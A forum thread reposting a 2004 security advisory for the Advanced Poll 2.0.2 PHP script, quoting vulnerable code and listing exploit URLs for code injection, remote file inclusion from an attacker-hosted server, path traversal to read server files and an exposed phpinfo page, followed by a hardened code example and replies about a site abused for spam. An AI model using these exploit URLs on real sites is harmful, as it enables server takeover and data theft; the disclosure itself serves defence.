11/05/2004 10:30:29
Jam'n
Graduate
Joined: 07/01/2003 17:31:39
Messages: 166
Location: Netherlands
It seems there is also a bug in Advanced Poll 2.0.2
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
comments.php :
------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");
for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------
booth.php, png.php :
---------------------------------------------------------------
<?php
$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}
if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------
poll_ssi.php, popup.php :
----------------------
include "./booth.php";
----------------------
admin/common.inc.php :
---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------
In the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
:
------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);
require "./common.inc.php";
[...]
------------------------------------
misc/info.php :
-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------
Exploits :
°°°°°°°°
- if magic_quotes_gpc=OFF :
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
or with a POST form or cookies.
- This will only work if register_globals=OFF (this is not an error...) :
http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php
- This will work if register_globals=OFF OR ON :
http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.
The same hole can be found, in the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view
- http://[target]/misc/info.php will show the phpinfo().
Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .
Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info
Jam'n
------------------------------------------------
Only the man who's truly educated
understands that he knows very little...
------------------------------------------------
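As an added example (not code from Advanced Poll or from the advisory above), this is how the two patterns quoted in the post can be written without eval() or variable-variables: request parameters are copied into an explicit whitelist array, and the language file is confined to the lang directory instead of being built from a request-controlled path. The function names read_poll_vars and lang_file, and the use of dirname(__DIR__) in place of $base_path, are assumptions.

```php
<?php
// Added example, not part of Advanced Poll: hardened replacements for the
// eval()-based registration in comments.php and the lang include in common.inc.php.
// Only these request keys are accepted; anything else in the request is ignored.
const POLL_VARS = array('id', 'template_set', 'action');

// Copies the whitelisted parameters into an array. No eval() and no
// variable-variables ($$name), so request data is never parsed as PHP source
// and cannot overwrite unrelated variables such as $include_path or $base_path.
function read_poll_vars(array $post, array $get)
{
    $vars = array();
    foreach (POLL_VARS as $name) {
        if (isset($post[$name])) {
            $vars[$name] = trim((string) $post[$name]);
        } elseif (isset($get[$name])) {
            $vars[$name] = trim((string) $get[$name]);
        } else {
            $vars[$name] = '';
        }
    }
    return $vars;
}

// Maps a requested language name to a file inside $base_path/lang. The name must
// be a plain "token.php"; a URL, "../" or a NUL byte falls back to english.php.
// realpath() resolves the final path so it can be checked to still sit directly
// inside the lang directory. Returns null when the lang directory is missing.
function lang_file($base_path, $requested)
{
    $lang_dir = realpath($base_path . '/lang');
    if ($lang_dir === false) {
        return null;
    }
    $default = $lang_dir . '/english.php';
    // \z (not $) so a trailing newline cannot slip past the check
    if (!is_string($requested) || !preg_match('/^[a-z_]+\.php\z/', $requested)) {
        return $default;
    }
    $candidate = realpath($lang_dir . '/' . $requested);
    if ($candidate === false || dirname($candidate) !== $lang_dir) {
        return $default;
    }
    return $candidate;
}

// Usage as common.inc.php would call it; $_GET['lang'] stands in for $pollvars[lang].
$pollvars  = read_poll_vars($_POST, $_GET);
$lang_path = lang_file(dirname(__DIR__), isset($_GET['lang']) ? $_GET['lang'] : '');
if ($lang_path !== null && is_file($lang_path)) {
    include $lang_path;
}
```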
06/06/2008 08:16:20
hailstone
Newbie
Joined: 06/06/2008 08:05:28
Messages: 3
I found out this the hard way. With version 2.03 of Advanced Poll the attackers used external scripts to send spam. Only when the web host disabled the website due to spam complaints did we find out.
I hope this has been fixed in newer versions (I couldn't find a change log to check) before it happens to someone else.
06/06/2008 09:13:12
Carbonize
Master
Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
This is why you should always make sure your scripts are up to date.
Carbonize
I am not the maker of the Advanced Guestbook
get Lazarus
06/06/2008 10:01:21
hailstone
Newbie
Joined: 06/06/2008 08:05:28
Messages: 3
Yes. Does that mean it is fixed?
06/06/2008 17:12:59
Carbonize
Master
Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
To the best of my knowledge but as no changelog is produced and I am not a user of the Poll I couldn't say.
07/06/2008 10:37:36
hailstone
Newbie
Joined: 06/06/2008 08:05:28
Messages: 3
Ok, thanks for your help.